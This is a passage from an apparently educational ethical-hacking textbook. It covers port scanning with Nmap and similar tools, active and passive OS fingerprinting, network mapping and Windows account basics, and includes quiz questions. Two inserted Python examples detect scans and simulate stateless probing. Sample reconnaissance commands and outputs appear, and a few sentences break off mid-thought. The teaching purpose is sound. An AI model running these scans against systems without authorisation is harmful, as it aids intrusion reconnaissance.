TCP 10.150.0.200:21 236.219.139.207:49162 Established
TCP 10.150.0.200:21 238.100.72.228:37899 Established

The connections have specifically been labeled with the text SYN_RECV, which indicates a half-open connection. Running this command in practice would be impractical, but the example does show that it is possible to detect half-open connections.

Port Scanning Countermeasures

Port scanning is a very effective tool for an ethical hacker or attacker, and proper countermeasures should be deployed. These countermeasures include the range of techniques utilized by an organization's IT security group to detect and prevent successful port scanning from occurring. As there are a number of techniques that can be used to thwart port scanning, it would be impossible to cover them all, but listed here are some countermeasures that prevent an attacker from acquiring information via a port scan:

• Deny all — Designed to block all traffic to all ports unless such traffic has been explicitly approved
• Proper design — A careful and well-planned network that includes security measures such as IDSs and firewalls
• Firewall testing — Scanning a firewall is used to verify its capability to detect and block undesirable traffic.
• Port scanning — Utilizes the same tools that an attacker will use to attack a system with the goal of gaining a better understanding of the methods involved
• Security awareness training — An organization should strive to provide a level of security awareness within the organization. With proper security awareness in place, personnel will know how to look for certain behaviors and maintain security. Security awareness will also be used to verify that security policies and practices are being followed and to determine whether adjustments need to be made.

Mapping Open Ports

With scanning completed and information obtained, the next step of mapping the network can be performed. An attack in this stage has moved into a more interactive and aggressive format.
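The probe types listed above and the half-open check shown with netstat can be turned into a small defender-side detector. This is an added example, not code from the text: the packet records and netstat lines are constructed, the flag bit values are the standard TCP header bits, and the expected replies follow the scan descriptions given above.

```python
"""Defender-side scan detection for the TCP probe types described above.

Added example (not code from the original text).  The packet records and
netstat lines below are constructed to exercise the detector; the only
real values are the standard TCP flag bits.
"""
from collections import defaultdict

# TCP header flag bits (RFC 793 bit positions).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
ALL_FLAGS = FIN | SYN | RST | PSH | ACK | URG


def classify_probe(flags):
    """Map a probe's flag set to the scan type named in the text.

    Returns None for flag sets that look like ordinary traffic (e.g. PSH|ACK
    on an established connection).
    """
    if flags == 0:
        return "NULL"
    if flags == FIN:
        return "FIN"
    # The text describes an XMAS probe as "all flags lit"; Nmap's -sX sets
    # FIN, PSH and URG.  Treat both as XMAS.
    if flags in (ALL_FLAGS, FIN | PSH | URG):
        return "XMAS"
    if flags == SYN:
        return "SYN"          # first step of a connect or half-open scan
    if flags == ACK:
        return "ACK"
    return None


def expected_reply(scan_type, port_open):
    """Reply a target sends according to the scan descriptions above."""
    if scan_type == "SYN":
        return "SYN/ACK" if port_open else "RST/ACK"
    if scan_type in ("FIN", "NULL", "XMAS"):
        return "no response" if port_open else "RST"
    if scan_type == "ACK":
        return "RST (unfiltered)"   # a filtered port answers with ICMP or silence
    return "n/a"


def detect_scanners(records, min_ports=10):
    """Flag sources that send scan-type probes to many distinct ports.

    records: iterable of (src_ip, dst_port, flags).  Returns
    {src_ip: {"ports": n, "types": {scan_type: count}}} for flagged sources.
    """
    ports = defaultdict(set)
    types = defaultdict(lambda: defaultdict(int))
    for src, dport, flags in records:
        kind = classify_probe(flags)
        if kind is None:
            continue
        ports[src].add(dport)
        types[src][kind] += 1
    return {src: {"ports": len(p), "types": dict(types[src])}
            for src, p in ports.items() if len(p) >= min_ports}


def count_half_open(netstat_lines):
    """Count SYN_RECV (half-open) connections per foreign host from
    'netstat -n -p TCP'-style lines laid out as PROTO LOCAL FOREIGN STATE."""
    counts = defaultdict(int)
    for line in netstat_lines:
        parts = line.split()
        if len(parts) == 4 and parts[0] == "TCP" and parts[3] == "SYN_RECV":
            counts[parts[2].rsplit(":", 1)[0]] += 1
    return dict(counts)


# Constructed sample: one host sweeping 20 ports with SYN probes, one host
# sending three NULL probes, and a normal client talking to port 80.
SAMPLE_RECORDS = [("203.0.113.5", p, SYN) for p in range(20, 40)]
SAMPLE_RECORDS += [("203.0.113.9", p, 0) for p in (21, 22, 23)]
SAMPLE_RECORDS += [("198.51.100.7", 80, SYN), ("198.51.100.7", 80, ACK),
                   ("198.51.100.7", 80, PSH | ACK)]

# Constructed netstat output in the layout shown in the text.
SAMPLE_NETSTAT = [
    "TCP 10.150.0.200:21 203.0.113.5:40001 SYN_RECV",
    "TCP 10.150.0.200:22 203.0.113.5:40002 SYN_RECV",
    "TCP 10.150.0.200:80 203.0.113.5:40003 SYN_RECV",
    "TCP 10.150.0.200:80 198.51.100.7:5122 ESTABLISHED",
]

if __name__ == "__main__":
    for src, info in detect_scanners(SAMPLE_RECORDS).items():
        print(f"{src}: {info['ports']} ports probed, types {info['types']}")
    print("half-open connections per host:", count_half_open(SAMPLE_NETSTAT))
```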
There are many tools available that can be used to map open ports and identify services on a network. Because every tool cannot be covered, it is necessary to limit the discussion to those tools that are widely used and well known. No matter which tools are to be used, however, the activity here can be boiled down to determining whether a target is live and then port scanning the target.

Nmap

Nmap is one of the most widely used security tools, and a firm understanding of Nmap is considered a requirement for security professionals. At its core, Nmap is a port scanner that has the ability to perform a number of different scan types. The scanner is freely available for several operating systems, including Windows, Linux, MacOS, and others. By design, the software runs as a command line application, but to make usage easier, a graphical user interface (GUI) is available through which the scan can be configured. The strength of Nmap is that it has numerous command line switches to tailor the scan to return the desired information. The most common command switches are listed in Table 6-3.

TABLE 6-3 Nmap options.

| NMAP COMMAND | SCAN PERFORMED |
|---|---|
| -sT | TCP connect scan |
| -sS | SYN scan |
| -sF | FIN scan |
| -sX | XMAS tree scan |
| -sN | NULL scan |
| -sP | Ping scan |
| -sU | UDP scan |
| -sO | Protocol scan |
| -sA | ACK scan |
| -sW | Window scan |
| -sR | RPC scan |
| -sL | List/DNS scan |
| -sI | Idle scan |
| -P0 | Don't ping |
| -PT | TCP ping |
| -PS | SYN ping |
| -PI | ICMP ping |
| -PB | TCP and ICMP ping |
| -PP | ICMP timestamp |
| -PM | ICMP netmask |
| -oN | Normal output |
| -oX | XML output |
| -oG | Grepable output |
| -oA | All output |
| -T Paranoid | Serial scan; 300 sec between scans |
| -T Sneaky | Serial scan; 15 sec between scans |
| -T Polite | Serial scan; .4 sec between scans |
| -T Normal | Parallel scan |
| -T Aggressive | Parallel scan |
| -T Insane | Parallel scan |

To perform an Nmap scan, at the Windows command prompt, type Nmap, the IP address, and the switches that are needed to perform the scan desired. For example, to scan the host with the IP address 192.168.123.254 using a full TCP connect scan type, enter the following at the command line:

Nmap -sT 192.168.123.254

The response will be similar to this:

Starting Nmap 4.62 (http://nmap.org) at 2010-03-21 10:37 Central Daylight Time
Interesting ports on 192.168.123.154:
Not shown: 1711 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2601/tcp open zebra
2602/tcp open ripd
MAC Address: 00:16:01:D1:3D:5C (Linksys)
Nmap done: 1 IP address (1 host up) scanned in 113.750 seconds

These results provide information about the victim system, specifically the ports that are open and ready to accept connections. Additionally, since the scan was performed against a system on the local network, it also displays the media access control (MAC) address of the system being scanned.
The port information can be used later to obtain more information, as will be explored later. Nmap's results can display the status of a port in one of three states:

• Open — The target device is accepting connections on the port.
• Closed — A closed port is not listening or accepting connections.
• Filtered — A firewall, filter, or other network device is monitoring the port and preventing full probing to determine its status.

FYI: One of the more common types of scan is a full TCP connect scan (-sT) because it completes all three steps of the TCP handshake. While a full connect scan is the most common, a stealth scan is seen as more covert because only two steps of the three-step handshake are performed. One of the techniques to perform a somewhat stealthy scan is a SYN scan, which only performs the first two steps. This type of scan is also known as "half open" scanning as it does not complete the connection.

FIGURE 6-1 Superscan.

Superscan

Superscan is a Windows-based port scanner developed by Foundstone. This port scanner is designed to scan TCP and UDP ports, perform ping scans, run Whois queries, and use tracert. Superscan is a GUI-based tool that has a preconfigured list of ports to scan or can be customized to scan a specific range. It's shown in Figure 6-1.

Scanrand

Scanrand is a scanning tool that is designed to scan a single host up to large-scale networks quickly and then return results about the network. Scanrand is unique among network scanners because although most scan a port at a time, Scanrand scans ports in parallel using what is known as stateless scanning. By using stateless scanning, Scanrand can perform scans much faster than other network scanners. Stateless scanning is an approach to scanning that splits scanning into two distinct processes. The two processes work together to complete the scanning process, with one process transmitting and the other listening for results. Specifically, the first process transmits connection requests at a high rate, and the second process is responsible for sorting out the results. The power of this program is a process known as inverse SYN cookies. Scanrand builds a hashed sequence number that is placed in the outgoing packet and that can be identified upon return. This value contains information that identifies source IP, source port, destination IP, and destination port. Scanrand is useful to a security professional when a large number of IP addresses need to be scanned quickly.

NOTE: Scanrand is available for both the Linux and UNIX platforms; there is no Windows equivalent.

THC-Amap

THC-Amap (Another Mapper) is a scanner that offers a different approach to scanning. When using traditional scanning programs, problems arise when services that use encryption are scanned, because these services might not return a banner, due to the fact that certain services such as the Secure Sockets Layer (SSL) expect a handshake. Amap handles this by storing a collection of normal responses that can be provided to ports to elicit a response. The tool also excels at allowing the security professional to find services that have been redirected from standard ports.
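The inverse SYN cookie mechanism described under Scanrand can be shown without any network I/O: the sequence number of each probe is a keyed hash of the four values the text names, and the listener recomputes it from a reply's addresses, so nothing has to be remembered between sending and listening. The following is an added example and not Scanrand's code; the key and the simulated replies are constructed, and the function names are hypothetical.

```python
"""Stateless probe correlation in the style of Scanrand's inverse SYN cookies.

Added example, not Scanrand's code.  The sending side derives the TCP
sequence number of each probe from the connection 4-tuple with a keyed hash;
the listening side recomputes it from a reply's addresses, so no per-probe
state is kept.  The secret key and the sample replies are constructed.
"""
import hashlib
import hmac
import socket
import struct

# A real implementation would draw a fresh random key per run; this fixed
# value only makes the example reproducible.
SECRET_KEY = b"constructed-example-key"


def inverse_syn_cookie(src_ip, src_port, dst_ip, dst_port, key=SECRET_KEY):
    """32-bit sequence number bound to (source IP, source port, destination IP,
    destination port), the four values the text says the cookie encodes."""
    material = (socket.inet_aton(src_ip) + struct.pack("!H", src_port)
                + socket.inet_aton(dst_ip) + struct.pack("!H", dst_port))
    digest = hmac.new(key, material, hashlib.sha256).digest()
    return struct.unpack("!I", digest[:4])[0]


def classify_reply(reply, key=SECRET_KEY):
    """Check a reply against the cookie and report the probed port's state.

    reply: dict with src_ip, src_port, dst_ip, dst_port, ack, flags, where the
    reply's source is the probed host.  A SYN/ACK or RST/ACK answering a SYN
    acknowledges cookie + 1, so the listener recomputes the cookie with the
    roles swapped and compares.  Returns None for replies it did not solicit.
    """
    expected = inverse_syn_cookie(reply["dst_ip"], reply["dst_port"],
                                  reply["src_ip"], reply["src_port"], key)
    if reply["ack"] != (expected + 1) & 0xFFFFFFFF:
        return None
    if reply["flags"] == "SYN/ACK":
        return "open"
    if reply["flags"] == "RST/ACK":
        return "closed"
    return "unknown"


def simulate(scanner_ip, target_ip, ports, open_ports, key=SECRET_KEY):
    """Constructed round trip: build probes, have a pretend target answer them,
    and classify the replies without storing any probe state in between."""
    src_port = 40000
    replies = []
    for port in ports:
        seq = inverse_syn_cookie(scanner_ip, src_port, target_ip, port, key)
        replies.append({"src_ip": target_ip, "src_port": port,
                        "dst_ip": scanner_ip, "dst_port": src_port,
                        "ack": (seq + 1) & 0xFFFFFFFF,
                        "flags": "SYN/ACK" if port in open_ports else "RST/ACK"})
    # An unsolicited (or spoofed) packet carrying a made-up acknowledgement
    # number: the cookie check rejects it instead of recording a false result.
    replies.append({"src_ip": target_ip, "src_port": 8080, "dst_ip": scanner_ip,
                    "dst_port": src_port, "ack": 12345, "flags": "SYN/ACK"})
    return {r["src_port"]: classify_reply(r, key) for r in replies}


if __name__ == "__main__":
    print(simulate("192.0.2.10", "192.0.2.20", [21, 22, 80], {22, 80}))
```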
NOTE: THC-Amap is similar to Nmap in that it can identify a service that is listening on a given port. Amap does not include the extensive identification abilities possessed by Nmap, but it can be used to confirm results of Nmap or to fill in any gaps.

OS Fingerprinting

Open ports that have been uncovered during the port scanning phase need to be further investigated because the mere existence of an open port does not mean a vulnerability exists; this must still be determined. The open ports that are discovered provide clues to what operating system is in use on the target. Determining the operating system that is in use on a specific target is the purpose of what is known as OS fingerprinting. Once an operating system is identified, it is possible to better focus the attacks that come later. To identify an OS, there are two different methods that can be utilized: active fingerprinting or passive fingerprinting. OS fingerprinting relies on the unique characteristics that each OS possesses to function. Each operating system responds to communication attempts in different ways that, once analyzed, can allow for a well-educated guess to be made about the system in place. To seek out these unique characteristics, active and passive fingerprinting can probe a system to generate a response or listen to a system's communications for details about the OS.

There are literally untold numbers of techniques available to use in an attack. In some cases, these techniques are specific to an operating system due to the vulnerability involved, such as a design flaw in the OS or a software defect. When an attack is meant to be used against a specific OS, it would be pointless to unleash it against a target that is not vulnerable, which would both waste time and risk detection.

Everything Has a Price

Active OS fingerprinting has advantages that make it an attractive option, at least on the surface. The process generally does not take as long to identify a target because the attacker requests information instead of waiting for it, as in passive fingerprinting. While performance is a benefit, the downside is that the process of active fingerprinting has a much higher chance of revealing the attack. It is more than likely that the process of active fingerprinting will trigger defensive countermeasures such as IDS and firewalls, which will respond by alerting the network owners about the attack and shutting it down. Does this mean active fingerprinting is a bad idea? Not necessarily — there is a time and place for it, and knowing when to use active methods and how aggressively to use them is important. Active fingerprinting, for example, is an ideal mechanism to scan a large number of hosts quickly, but the danger of being detected and stopped still exists.

Active OS Fingerprinting

The process of active OS fingerprinting is accomplished by sending specially crafted packets to the targeted system. In practice, several probes or triggers are sent from the scanning system to the target. When the responses are received from a targeted system, an educated guess can be made, based on the responses, as to the OS that is present. Though it may appear otherwise, OS identification is an accurate means of determining the system in place because the tools have become much more accurate than in the past.

Xprobe2

Xprobe2, a commonly used active fingerprinting tool, relies on a unique method to identify an operating system known as fuzzy signature matching. This method consists of performing a series of tests against a certain target and collecting the results. The results are then analyzed to produce a probability that a system is running a specific OS. Xprobe2 cannot say definitively which operating system is running, but instead uses the results to infer what system is running.
As an example, running Xprobe2 against a targeted system yields the following results:

75% Windows 7
20% Windows XP
5% Windows 98

The results that Xprobe2 is presenting here are the probability that the system is running a given OS. Xprobe2 comes with several predefined profiles for different OSs, and the results are compared against these profiles to generate the results seen here. The results show that there are three OSs that match profiles to different degrees: the results for Windows 7 are at 75 percent and the others are quite low, so it can be assumed with some confidence that Windows 7 is in place. This score is intended to determine which operating system the target computer is running.


Which Method Is Better?

Nmap can be used with or without a GUI, and it is up to the individual users to determine
which is best for their own particular style. For those who are not comfortable with
the command line, the GUI is a great way to learn and get acquainted with what the
command line switches look like for specific operations. The Zenmap GUI is a front end
for Nmap that makes the product easier to use while allowing the operator to see what
the command line looks like. Consider using Zenmap to start; then use the command line
once a comfort level is achieved with the commands.

Nmap

Valuable in OS fingerprinting as well as port scanning, Nmap can provide reliable data on
which operating system is present. Nmap is effective at identifying the OSs of networked
devices and generally can provide results that are highly accurate. Several Nmap options
that can be used to fine-tune the scan include:

• -sV Application version detection

• -O OS fingerprinting

• -A Both of the previous options

An example of an Nmap scan with the -O option is shown here:
Nmap -O 192.168.123.254

Starting Nmap 4.62 (http://nmap.org) at 2010-03-21 12:09 Central Daylight Time
Interesting ports on 192.168.123.22:
Not shown: 1712 closed ports
PORT STATE SERVICE
80/tcp open http
2601/tcp open zebra
2602/tcp open ripd
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18-2.4.32 (likely RedHat)
Uptime: 77.422 days (since Sun Jan 03 01:01:46 2010)
Network Distance: 1 hop


Nmap has identified this system as Linux along with version and uptime information.
An attacker gaining this information can now target an attack to make it more effective
because it would be possible to focus on only those exploits that are appropriate — for
example, no Windows attacks. Nmap is capable of identifying commonly encountered
network devices and is a tool that should not be overlooked.

Passive OS Fingerprinting

The alternative to active fingerprinting is passive fingerprinting, which approaches the
process differently. Passive fingerprinting, by design, does not interact with the target
system itself; it is a passive tool that monitors or captures network traffic. The traffic
monitored is analyzed for patterns that would suggest which operating systems are in use.
Passive OS fingerprinting tools simply sniff network traffic and then match that traffic
to specific OS signatures. The database of known patterns can be updated from time to
time as new operating systems are released and updated. As an example, a tool may have
a fingerprint for Windows Vista but will need to be updated to include Windows 7.

A passive identification requires larger amounts of traffic, but offers a level of stealth,
as it is much harder to detect these tools, since they do not perform any action that
would reveal their presence. These tools are similar in that they examine specific types
of information found in IP and TCP headers. While you do not need to understand the
inner workings of TCP/IP to use these tools, you should have a basic understanding
as to what areas of these headers these tools examine. These include:

• TTL Value
• Don't Fragment Bit (DF)
• Type of Service (TOS)
• Window Size

The p0f Tool

A tool for performing passive OS fingerprinting is a tool named p0f, which can identify
an OS using passive techniques. That means p0f can identify the target without placing
any additional traffic on the network that can lead to detection. The tool attempts
to fingerprint the system based on the incoming connections that are attempted.

Patience Is a Virtue

While passive OS fingerprinting generally does not yield results as quickly as active OS
fingerprinting, there are still benefits. Passive OS fingerprinting allows an attacker to obtain
information about a target without triggering network defensive measures such as IDS
or firewalls. While the process may take longer than active fingerprinting, the benefit
is that the victim has less chance of detecting and reacting to the impending attack.

Remember: Active fingerprinting contacts the host; passive fingerprinting does not.


Are We There Yet?

The results of the scanning process shown here can be misleading because it is possible
that p0f will not be able to identify a system for a number of different reasons. In such
events, p0f will return results that state "unknown" for the operating system instead
of an actual OS. In these cases, it may be necessary to try another passive tool or switch
to active methods to determine the OS.

The following results have been generated using p0f:

C:\>p0f -il
p0f - passive os fingerprinting utility, version 3.0.4
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
WIN32 port (C) M. Davis <mike@datanerds.net>, K. Kuehl <kkuehl@cisco.com>
p0f: listening (SYN) on \Device\NPF_;Ml34627-43B7-4FE5-AF9B
2 sigs (12 generic), rule: 'all'.
1. 123.254: 1045-Linux RedHat

Once p0f is running, it will attempt to identify the system that is being connected to,
based on the traffic that it observes. The previous example shows that p0f has identified
the system in question as being a distribution of Linux known as RedHat.

NOTE

The tools in this category were
designed to help those who create
networks manage them. However,
as with most tools, the possibility for
abuse exists. As is true in most cases,
the tool isn’t evil or bad; it’s the
intention of the user that actually
determines whether honorable
or less-than-honorable actions
will be the result.

Mapping the Network

The next step in the process is to generate a picture of the
network that is being targeted. When the information has
been collected and organized, a network diagram can be
produced that will show vulnerable or potentially vulnerable
devices on the target network. A number of network
management tools can produce an accurate map of the
network built of information that has been gathered previously in addition to new
information. Some tools that can
help in the process include SolarWinds Toolset, Cheops,
Queso, and Harris Stat.


Even without these tools, you should be able to manually map your findings. This
information can be recorded in a notebook or a simple spreadsheet. This spreadsheet
should contain domain name information, IP addresses, domain name system (DNS)
servers, open ports, OS version, publicly available IP address ranges, wireless access
points, modem lines, and application banner details you may have discovered.

Cheops

Cheops is an open source network management tool that can assist in viewing the
network layout and the devices therein. Cheops can assist an attacker in the same way
it would assist a network admin: it performs tasks such as identifying hosts on a network
and the services each offers. Even more useful is the ability to display the whole network
in a graphic format showing the paths of data between systems on the target network.

Solarwinds

Solarwinds is another network management tool that can be used to render a diagram
of a network and the services within. Solarwinds has the ability to detect, diagram,
and reflect changes in the network architecture with a few button clicks. It is even
possible for Solarwinds to generate network maps that can be viewed in products such
as Microsoft’s diagramming product Visio.

Analyzing the Results

With a wealth of data on hand, the attacker now must undertake the process of analysis.
Understanding the victim and identifying potential points of entry require careful analysis and
organization. At this point, the attacker starts to plan the attack. When analyzing data,
for example, items such as an open wireless access point can lead a hacker to consider
additional wardriving or wireless attack activities in an attempt to connect to the
network. Another example is an unpatched Web server that would present the hacker
an opportunity to run an attack against the server itself. Generally, these steps would
be the following:

• Analyze the services that have been revealed.

• Explore vulnerabilities for each service or system.

• Research and locate any potential exploits that can be used to attack the system.

Once each of these items has been completed, the attacker can use a search
engine to gather information about potential attacks by searching the OS and exploits.
Plenty of information is available for an attacker to learn how to position an attack.
As one example, http://www.securityfocus.com was searched for vulnerabilities for the Windows
Web server IIS version 5. The results are shown in Figure 6-2. Notice that there are more
than three pages of results.


FIGURE 6-2 Microsoft IIS vulnerabilities.

It is at this point that the reasons for patiently and thoroughly collecting information
about a target become clear. With the results of previous scans, maps, and other data
gathered, a target can be more accurately pinpointed resulting in a more effective and
potentially devastating attack.


CHAPTER SUMMARY

This chapter introduced the concept of port scanning. Port scanning is a technique
that is used to identify services present on a system or range of systems. The purpose
of port scanning is to get a better idea of what is present and running on a target.
To identify the services that are available on a system, several techniques can be used, including
wardriving, wardialing, and ping sweeps. Once services have been identified and
confirmed, the next step is to learn about the operating system to better target
the attack itself.

There are two ways to determine the OS: active and passive fingerprinting.
Active fingerprinting identifies a system or range of systems by sending specially
crafted packets designed to reveal unique characteristics about the target. The
downside of this type of fingerprinting is that the process can be easily detected.
Active fingerprinting tools include Nmap and Xprobe2. The alternative to active
fingerprinting is passive fingerprinting, which is stealthier, but is not as accurate.
One of the best passive fingerprinting tools is p0f.

The attacker will then move on to mapping the network to determine the nature
and relationship of the hosts on the network. Network mapping reveals the nature
and relationship of the network in a graphical format, allowing for a better view
of the network. Network mapping is one of the last steps before choosing an attack.

Once applications have been mapped and operating systems identified, the attack
moves to the final steps, which include mapping the network and analyzing the
results. An attacker that has obtained information about services is very close to
being able to launch an attack. As a security professional, your goal is to find these
problems and fix them before the hacker can exploit these findings.

KEY CONCEPTS AND TERMS

• Active fingerprinting
• Banner
• Internet Control Message Protocol (ICMP)
• OS identification
• Passive fingerprinting
• Ping sweep


CHAPTER 6 ASSESSMENT

1. ________ is a popular though easily detectable scanning technique.

A. Full connect
B. Half open scanning
C. NULL scan
D. XMAS tree scan

2. Which of the following is the Nmap command line switch for a full connect port scan?

A. -sS
B. -sU
C. -sT
D. -O

3. Which of the following is an example of a passive fingerprinting tool?

A. Superscan
B. Xprobe2
C. Nmap
D. p0f

4. TCP and UDP both use flags.

A. True
B. False

5. Which of the following statements is most correct?

A. Active fingerprinting tools inject packets into the network.
B. Passive fingerprinting tools inject traffic into the network.
C. Nmap can be used for passive fingerprinting.
D. Passive fingerprinting tools do not require network traffic to fingerprint an operating system.

6. Which of the following is not a network mapping tool?

A. Solarwinds
B. Netstat
C. Cheops
D. Harris Stat

7. ________ is the point at which an attacker starts to plan his or her attack.

A. Active OS fingerprinting
B. Passive OS fingerprinting
C. Port scanning
D. Analyzing the results

8. A XMAS tree scan sets all of the following flags except ________.

A. SYN
B. URG
C. PSH
D. FIN

9. Of the two protocols discussed, which is more difficult to scan for?

10. You have been asked to perform a port scan for POP3. Which port will you scan for?

A. 22
B. 15
C. 69
D. 110

11. Ping scanning does not identify open ports.

A. True
B. False

12. The process of determining the underlying version of the system program being used is best described as ________.

A. OS fingerprinting
B. Port scanning
C. Wardialing
D. Wardriving

13. Which of the following switches is used for an ACK scan?

A. -sU
B. -sS
C. -sA
D. -sT

CHAPTER 7

Enumeration and Computer System Hacking

WITH THE INFORMATION collected up to this point, an attacker has a
better picture of what the targeted environment looks like. What the
attacker doesn't know, however, is what the system is actually offering.
Determining what a system is offering is the goal of the process of enumeration.
Enumeration takes the information that has already been carefully gathered
and attempts to extract information about the exact nature of the system itself.

Enumeration is the most aggressive of the information gathering processes
seen up to this point. Up to this point, information has been gathered without
interacting to a high degree with the target. In contrast, with enumeration,
the target is being interacted with and is returning information to the attacker.
Information extracted from a target at this point includes usernames, group
info, share names, and other details.

Once enumeration has been completed, the process of system hacking can
begin. In the system hacking phase, the attack has reached its advanced stages
in which the attacker starts to use the information gathered from the previous
phases to break into or penetrate the system.

After the enumeration stage, the attack has begun, and the attacker runs
code on the remote system. The attacker is now placing software or other items
on a system in an effort to maintain access over the long term. An attacker
places backdoors to leave a system open for repeated usage in attacks or other
activities as needed.

Finally, attackers cover up their tracks to avoid detection and possible
countermeasures later. In this last phase, attackers make an effort to eliminate
the traces of their attack as completely as possible, leaving few, if any,
traces behind.


Chapter 7 Topics

This chapter covers the following topics and concepts:

• What some basics of Windows are

• What some commonly attacked and exploited services are

• What enumeration is

• What system hacking is

• What the types of password cracking are

• How attackers use password cracking

• How attackers use PsTools

• What rootkits are and how attackers use them

• How attackers cover their tracks

Chapter 7 Goals

When you complete this chapter, you will be able to:

• Explain the process of enumeration

• Explain the process of system hacking

• Explain the process of password cracking

• Identify some of the tools used to perform enumeration

• Understand the significance of privilege escalation

• Explain how to perform privilege escalation

• Explain the importance of covering tracks

• Explain how to cover tracks

• Understand the concept of backdoors

• Explain how to create backdoors

Windows Basics

The Windows operating system can be used as both a stand-alone and a networked
operating system, but for the purposes of this chapter you will consider mostly the
networked aspects of the operating system (OS). It is important to consider what needs
to be secured and how to secure the operating system in the networked environment.
One of the big issues of securing Windows in the networked environment is the sheer
number of features that must be considered and locked down to prevent exploitation.
However, before we can determine what to secure, we need to know how Windows works.


Controlling Access

One of the first things that must be understood prior to securing
Windows is how access to resources such as file shares and other
items is managed. Windows uses a model that can be best summed
up as defining who gets access to what resources. For example,

Always consider what a user
account will be used for,
because that will dictate
what privileges it needs and
what ones it doesn't. For
example, if a user will never

Users

In the Windows OS, the fundamental object that is used to
determine access is the user account. User accounts are used in
Windows to access everything from file shares to running the services that
keep the system functioning. In fact, most of the services and processes that run on
the Windows operating system run with the help of a user account, but the question
is, which one. Processes in Windows are run under one of four user contexts:

• Local Service — A user account with greater access to the local system

• Network Service — A user account with greater access to the network

• SYSTEM — A super-user style account that gets nearly unlimited access to the local
system and can perform actions on the local system with little or no restriction

• Current User — The currently logged-in user who can run applications
and tasks, but still is subject to restrictions that other users are not subject to.
The restrictions on this account hold true even if the user account being used

Each of these user accounts is used for different specific reasons, and in a typical
Windows session each is running different processes behind the scenes to keep the
system performing.

Prior to the introduction of Windows XP, all system services ran under the SYSTEM account,
which allowed all the services to run as designed, but also gave each service more access than
it needed. With each service running with what was essentially no restrictions, the potential
for widespread harm if a service was compromised was unacceptable. Starting in Windows XP
and continuing up to the current version of Windows, services run under an account with the
appropriate level of access to perform their tasks and none of the extra access that could be
a hazard. As will be seen later, this setup limits the amount of damage an attacker could
cause if a service were compromised.


TABLE 7-1 SAM changes in Windows.

| NAME | EARLIEST WINDOWS VERSION SUPPORTED | DESCRIPTION |
| --- | --- | --- |
| LAN Manager (LM) | Windows for Workgroups | Considered weak due to the way hashes are created and stored |
| NT LAN Manager (NTLM) | Windows NT | Stronger than LM, but somewhat similar |
| Kerberos | Windows 2000 | Available with Active Directory |

NOTE

Remember that the
SAM is a file that
physically resides on
the hard drive and is
actively accessed while
Windows is running.

User account information can be physically stored in two
locations on a Windows system: in the SAM or in Active Directory.
The Security Account Manager (SAM) is a database on the local system
that is used to store user account information. By default, the SAM resides
within the Windows folder %WINNT%\system32\config\sam. This
is true of all versions of Windows clients or servers. The other method
of storing user information is in Active Directory, which is used in larger
network environments such as those present in mid- to enterprise-level
businesses. For simplicity, this chapter will not discuss Active Directory.
Inside the SAM are a few items that should be covered prior to moving forward with
other features: namely, some of the storage details that occur here. The SAM stores
within it hashed versions of users' passwords used to authenticate user accounts; these
hashes are stored in a number of different ways depending on the version of Windows.
The hash details are listed in Table 7-1.

Groups

Groups are used by Windows to grant access to resources and to simplify management.
Groups are effective administration tools that enable management of multiple users
because a group can contain a large number of users that can then be managed as a unit.
By using groups, you can assign access to a resource such as a shared folder to a group
instead of each user individually, saving substantial time and effort. You can configure
your own groups as you see fit on your network and systems, but most vendors such as
Microsoft include a number of predefined groups that you can use as well or modify as
needed. There are several default groups in Windows, discussed in the following list:

• Anonymous Logon — Designed to allow anonymous access to resources: typically
used when accessing the Web server or Web applications

• Batch — Used to allow batch jobs to run scheduled tasks, such as a nightly cleanup
job that deletes temporary files


• Creator Group — Windows 2000 uses this group to automatically grant access permissions
to users who are members of the same group(s) as the creator of a file or a directory.

• Creator Owner — The person who created the file or the directory is a member of this
group. Windows 2000 uses this group to automatically grant access permissions
to the creator of a file or directory.

• Everyone — All interactive, network, dial-up, and authenticated users are members
of this group. This group is used to give wide access to a system resource.

• Interactive — Any user logged on to the local system has the Interactive identity,
which allows only local users to access a resource.

• Network — Any user accessing the system through a network has the Network
identity, which allows only remote users to access a resource.

• Restricted — Users and computers with restricted capabilities have the Restricted
identity. On a member server or workstation, a local user who is a member of the
Users group (rather than the Power Users group) has this identity.

• Self — Refers to the object itself and allows the object to modify itself.

• Service — Any service accessing the system has the Service identity, which grants
access to processes being run by Windows 2000 services.

• System — The Windows 2000 operating system has the System identity, which
is used when the operating system needs to perform a system-level function.

• Terminal Server User — Allows terminal server users to access terminal server
applications and to perform other necessary tasks with terminal services.

Source: http://technet.microsoft.com/en-us/library/bb726982.aspx


Security Identifiers

Each user account in Windows has a unique ID assigned to it commonly known
as a security identifier (SID) that is used to identify the account or group. The SID is
a combination of characters that looks like the following:

S-1-5-52-1045537234-1292470599-306827719-19000

Why All the Codes?

SIDs may not sound like a good idea, but you need to look at why they are being used instead
of the actual usernames. For a moment consider usernames and SIDs to be like a person and
his or her phone number. If you were to go to any city in the world, you would find multiple
people with the same first name, but it is unlikely that those people would share the same
phone number. In Windows, once a SID is used it is never reused, meaning that even if the
user name is the same, Windows doesn't treat it as the same. By using this setup, an attacker
cannot gain access to your files or resources simply by naming their account the same as yours.

164 PART 2 A Technical Overview of Hacking

Even though you may use a username to access the system, Windows identifies each
user, group, or object by the SID. For example, Windows uses the SID to look up a user
account and see whether a password matches. Also, SIDs are used in every situation
in which permissions need to be checked, for example, when a user attempts to access a
folder or shared resource, to determine whether that user is allowed to access it.

Commonly Attacked and Exploited Services

The Windows OS exposes a tremendous number of services, each of which can be exploited
in some way by an attacker. Each service that runs on a system is designed to offer extra
features and capabilities to a system and, as such, Windows has a lot of basic services
running by default, which are supplemented by the ones applications themselves install.

Although there are a number of services running in Windows, one of the most
commonly targeted ones is the NetBIOS service, which uses User Datagram Protocol
(UDP) ports 137 and 138 and Transmission Control Protocol (TCP) port 139.

NetBIOS has long been a target for attackers due to its ease
of exploitation and the fact that it is commonly enabled on
Windows systems even when it is not needed. NetBIOS was
designed to facilitate communications between applications
in a local area network but is now considered to be a legacy
service and usually can be disabled.

In the Windows OS, the NetBIOS service can be used by an
attacker to discover information about a system. Information
that can be obtained via the service is very diverse and includes
user names, share names, and service information, among other
things. In the enumeration phase, we will see how to obtain
this information using something known as a NULL session.

